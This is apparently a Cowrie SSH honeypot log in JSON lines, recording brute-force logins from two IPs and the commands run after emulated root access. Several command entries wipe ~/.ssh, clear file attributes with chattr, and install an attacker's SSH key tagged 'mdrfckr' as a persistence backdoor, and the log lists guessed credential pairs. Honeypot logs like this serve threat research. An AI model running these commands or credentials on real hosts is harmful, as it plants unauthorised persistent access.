{"eventid":"cowrie.session.closed","duration":"10.7","message":"Connection lost after 10.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:24:53.933029Z","src_ip":"212.227.235.229","session":"acd241302671"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:24:53.936166Z","src_ip":"212.227.235.229","session":"7a239adf1b11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39446,"dst_ip":"1.2.3.4","dst_port":22,"session":"df95a19b2f7f","protocol":"ssh","message":"New connection: 212.227.235.229:39446 (1.2.3.4:22) [session: df95a19b2f7f]","sensor":"my-vps","timestamp":"2025-09-09T06:25:05.287332Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:25:05.288323Z","src_ip":"212.227.235.229","session":"df95a19b2f7f"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:25:05.678825Z","src_ip":"212.227.235.229","session":"df95a19b2f7f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47960,"dst_ip":"1.2.3.4","dst_port":22,"session":"3bdee624853f","protocol":"ssh","message":"New connection: 212.227.235.229:47960 (1.2.3.4:22) [session: 3bdee624853f]","sensor":"my-vps","timestamp":"2025-09-09T06:25:06.175461Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:25:06.178894Z","src_ip":"212.227.235.229","session":"3bdee624853f"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":46280,"dst_ip":"1.2.3.4","dst_port":22,"session":"224a6ed65878","protocol":"ssh","message":"New connection: 157.20.207.165:46280 (1.2.3.4:22) [session: 224a6ed65878]","sensor":"my-vps","timestamp":"2025-09-09T06:25:06.274108Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:25:06.275052Z","src_ip":"157.20.207.165","session":"224a6ed65878"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:25:06.349976Z","src_ip":"212.227.235.229","session":"3bdee624853f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:25:06.467323Z","src_ip":"157.20.207.165","session":"224a6ed65878"}
{"eventid":"cowrie.login.failed","username":"default","password":"pass","message":"login attempt [default/pass] failed","sensor":"my-vps","timestamp":"2025-09-09T06:25:07.048840Z","src_ip":"212.227.235.229","session":"3bdee624853f"}
{"eventid":"cowrie.login.success","username":"root","password":"hetzner","message":"login attempt [root/hetzner] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:25:07.285395Z","src_ip":"157.20.207.165","session":"224a6ed65878"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:25:07.736860Z","src_ip":"157.20.207.165","session":"224a6ed65878"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:25:07.737926Z","src_ip":"157.20.207.165","session":"224a6ed65878"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:25:07.739077Z","src_ip":"157.20.207.165","session":"224a6ed65878"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w#e$r","message":"login attempt [root/1q2w#e$r] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:25:07.849930Z","src_ip":"212.227.235.229","session":"df95a19b2f7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:07.935815Z","src_ip":"157.20.207.165","session":"224a6ed65878"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:08.225497Z","src_ip":"212.227.235.229","session":"3bdee624853f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:25:08.415586Z","src_ip":"157.20.207.165","session":"224a6ed65878"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:25:08.416491Z","src_ip":"157.20.207.165","session":"224a6ed65878"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:25:08.565092Z","src_ip":"212.227.235.229","session":"df95a19b2f7f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:25:08.565937Z","src_ip":"212.227.235.229","session":"df95a19b2f7f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:25:08.567165Z","src_ip":"212.227.235.229","session":"df95a19b2f7f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:25:08.612573Z","src_ip":"157.20.207.165","session":"224a6ed65878"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:08.613613Z","src_ip":"157.20.207.165","session":"224a6ed65878"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":46286,"dst_ip":"1.2.3.4","dst_port":22,"session":"04d2dde0c523","protocol":"ssh","message":"New connection: 157.20.207.165:46286 (1.2.3.4:22) [session: 04d2dde0c523]","sensor":"my-vps","timestamp":"2025-09-09T06:25:08.804009Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:25:08.804854Z","src_ip":"157.20.207.165","session":"04d2dde0c523"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:25:08.995311Z","src_ip":"157.20.207.165","session":"04d2dde0c523"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:09.269350Z","src_ip":"212.227.235.229","session":"df95a19b2f7f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:25:09.680195Z","src_ip":"212.227.235.229","session":"df95a19b2f7f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:25:09.680906Z","src_ip":"212.227.235.229","session":"df95a19b2f7f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:25:09.788437Z","src_ip":"157.20.207.165","session":"04d2dde0c523"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:25:10.034278Z","src_ip":"212.227.235.229","session":"df95a19b2f7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:10.035324Z","src_ip":"212.227.235.229","session":"df95a19b2f7f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40580,"dst_ip":"1.2.3.4","dst_port":22,"session":"8304025b9e61","protocol":"ssh","message":"New connection: 212.227.235.229:40580 (1.2.3.4:22) [session: 8304025b9e61]","sensor":"my-vps","timestamp":"2025-09-09T06:25:10.386858Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:25:10.388127Z","src_ip":"212.227.235.229","session":"8304025b9e61"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:25:10.739338Z","src_ip":"212.227.235.229","session":"8304025b9e61"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:10.975004Z","src_ip":"157.20.207.165","session":"04d2dde0c523"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":46290,"dst_ip":"1.2.3.4","dst_port":22,"session":"652333db11e4","protocol":"ssh","message":"New connection: 157.20.207.165:46290 (1.2.3.4:22) [session: 652333db11e4]","sensor":"my-vps","timestamp":"2025-09-09T06:25:11.158490Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:25:11.159732Z","src_ip":"157.20.207.165","session":"652333db11e4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:25:11.343738Z","src_ip":"157.20.207.165","session":"652333db11e4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:25:12.119361Z","src_ip":"157.20.207.165","session":"652333db11e4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:25:12.208730Z","src_ip":"212.227.235.229","session":"8304025b9e61"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:12.304499Z","src_ip":"157.20.207.165","session":"652333db11e4"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:12.305793Z","src_ip":"157.20.207.165","session":"224a6ed65878"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:13.584074Z","src_ip":"212.227.235.229","session":"8304025b9e61"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41361,"dst_ip":"1.2.3.4","dst_port":22,"session":"dcd68a88232d","protocol":"ssh","message":"New connection: 212.227.235.229:41361 (1.2.3.4:22) [session: dcd68a88232d]","sensor":"my-vps","timestamp":"2025-09-09T06:25:13.945235Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:25:13.946221Z","src_ip":"212.227.235.229","session":"dcd68a88232d"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:25:14.321614Z","src_ip":"212.227.235.229","session":"dcd68a88232d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:25:15.708468Z","src_ip":"212.227.235.229","session":"dcd68a88232d"}
{"eventid":"cowrie.session.closed","duration":"10.8","message":"Connection lost after 10.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:16.048144Z","src_ip":"212.227.235.229","session":"df95a19b2f7f"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:16.049569Z","src_ip":"212.227.235.229","session":"dcd68a88232d"}
